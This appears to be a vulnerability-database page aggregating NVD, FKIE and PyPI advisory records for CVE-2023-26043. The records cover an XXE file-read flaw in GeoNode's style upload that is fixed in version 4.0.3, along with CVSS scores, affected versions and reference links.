        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.0.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-26043"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-611"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
            },
            {
              "name": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2023-06-01T14:03Z",
      "publishedDate": "2023-02-27T21:15Z"
    }
  }
}

FKIE_CVE-2023-26043

Vulnerability from fkie_nvd - Published: 2023-02-27 21:15 - Updated: 2024-11-21 07:50

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0	Patch
security-advisories@github.com	https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	geosolutionsgroup	geonode	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF65F806-F0DC-43AE-BA82-D15F8BB2F5B8",
              "versionEndExcluding": "4.0.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\n"
    }
  ],
  "id": "CVE-2023-26043",
  "lastModified": "2024-11-21T07:50:38.857",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2023-02-27T21:15:12.103",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

PYSEC-2023-15

Vulnerability from pysec - Published: 2023-02-27 21:15 - Updated: 2023-05-04 03:49

Details

Impacted products

Name	purl
geonode	pkg:pypi/geonode

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "geonode",
        "purl": "pkg:pypi/geonode"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2fdfe919f299b21f1609bf898f9dcfde58770ac0"
            }
          ],
          "repo": "https://github.com/GeoNode/geonode",
          "type": "GIT"
        },
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.0",
        "2.0.1",
        "2.0.dev20130913181950",
        "2.0.dev20140626191247",
        "2.0b10",
        "2.0b11",
        "2.0b12",
        "2.0b13",
        "2.0b17",
        "2.0b18",
        "2.0b19",
        "2.0b21",
        "2.0b22",
        "2.0b24",
        "2.0b25",
        "2.0b26",
        "2.0b27",
        "2.0b28",
        "2.0b29",
        "2.0b3",
        "2.0b30",
        "2.0b31",
        "2.0b32",
        "2.0b33",
        "2.0b34",
        "2.0b35",
        "2.0b36",
        "2.0b37",
        "2.0b38",
        "2.0b39",
        "2.0b4",
        "2.0b40",
        "2.0b41",
        "2.0b42",
        "2.0b43",
        "2.0b44",
        "2.0b45",
        "2.0b46",
        "2.0b48",
        "2.0b49",
        "2.0b5",
        "2.0b50",
        "2.0b51",
        "2.0b52",
        "2.0b53",
        "2.0b54",
        "2.0b55",
        "2.0b57",
        "2.0b58",
        "2.0b59",
        "2.0b60",
        "2.0b61",
        "2.0b62",
        "2.0b63",
        "2.0b64",
        "2.0b7",
        "2.0c1",
        "2.0c12",
        "2.0c13",
        "2.0c2",
        "2.0c3",
        "2.0c4",
        "2.0c5",
        "2.0c7",
        "2.0c8",
        "2.10",
        "2.10.1",
        "2.10.2",
        "2.10.3",
        "2.10.4",
        "2.10rc0",
        "2.10rc1",
        "2.10rc2",
        "2.10rc3",
        "2.10rc4",
        "2.10rc5",
        "2.4",
        "2.4.1",
        "2.4a1",
        "2.4a10",
        "2.4a11",
        "2.4a12",
        "2.4a13",
        "2.4a14",
        "2.4a15",
        "2.4a16",
        "2.4a17",
        "2.4a18",
        "2.4a19",
        "2.4a2",
        "2.4a20",
        "2.4a21",
        "2.4a22",
        "2.4a23",
        "2.4a24",
        "2.4a25",
        "2.4a26",
        "2.4a28",
        "2.4a29",
        "2.4a3",
        "2.4a30",
        "2.4a31",
        "2.4a32",
        "2.4a33",
        "2.4a34",
        "2.4a35",
        "2.4a36",
        "2.4a38",
        "2.4a4",
        "2.4a5",
        "2.4a6",
        "2.4a7",
        "2.4a8",
        "2.4a9",
        "2.4b1",
        "2.4b10",
        "2.4b11",
        "2.4b12",
        "2.4b13",
        "2.4b14",
        "2.4b15",
        "2.4b16",
        "2.4b17",
        "2.4b18",
        "2.4b19",
        "2.4b2",
        "2.4b20",
        "2.4b21",
        "2.4b22",
        "2.4b23",
        "2.4b24",
        "2.4b25",
        "2.4b26",
        "2.4b27",
        "2.4b28",
        "2.4b3",
        "2.4b4",
        "2.4b5",
        "2.4b6",
        "2.4b7",
        "2.4b8",
        "2.4c1",
        "2.4c2",
        "2.4c3",
        "2.4c4",
        "2.5.1",
        "2.5.10",
        "2.5.12",
        "2.5.13",
        "2.5.14",
        "2.5.15",
        "2.5.2",
        "2.5.3",
        "2.5.4",
        "2.5.5",
        "2.5.6",
        "2.5.7",
        "2.5.9",
        "2.5.9.dev20170116091328",
        "2.5.dev20160825082804",
        "2.6",
        "2.6.1",
        "2.6.2",
        "2.6.3",
        "2.6a1",
        "2.6c1",
        "2.7",
        "2.7.1.dev20171013151516",
        "2.7.2.dev20171013181854",
        "2.7.4.dev20171114161428",
        "2.7.5.dev20180123130714",
        "2.7.5.dev20180125135927",
        "2.8",
        "2.8.1",
        "2.8.1rc0",
        "2.8rc0",
        "2.8rc1",
        "2.8rc10",
        "2.8rc11",
        "2.8rc12",
        "2.8rc13",
        "2.8rc2",
        "2.8rc3",
        "2.8rc4",
        "2.8rc5",
        "2.8rc6",
        "2.8rc7",
        "2.8rc8",
        "2.8rc9",
        "3.0.0",
        "3.1.0",
        "3.1.1",
        "3.2.0",
        "3.2.1",
        "3.2.2",
        "3.2.3",
        "3.2.3.post1",
        "3.2.4",
        "3.3.0",
        "3.3.1",
        "3.3.1.post1",
        "3.3.2",
        "3.3.2.post1",
        "3.3.2.post2",
        "3.3.3",
        "4.0.0",
        "4.0.0.post1",
        "4.0.0rc0",
        "4.0.0rc1",
        "4.0.1",
        "4.0.2"
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26043",
    "GHSA-mcmc-c59m-pqq8"
  ],
  "details": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.",
  "id": "PYSEC-2023-15",
  "modified": "2023-05-04T03:49:45.721412Z",
  "published": "2023-02-27T21:15:00Z",
  "references": [
    {
      "type": "FIX",
      "url": "https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0"
    },
    {
      "type": "EVIDENCE",
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-26043 (GCVE-0-2023-26043)

GHSA-MCMC-C59M-PQQ8

Summary

Details

PoC

Impact

GSD-2023-26043

FKIE_CVE-2023-26043

PYSEC-2023-15

Tags

Sightings

Nomenclature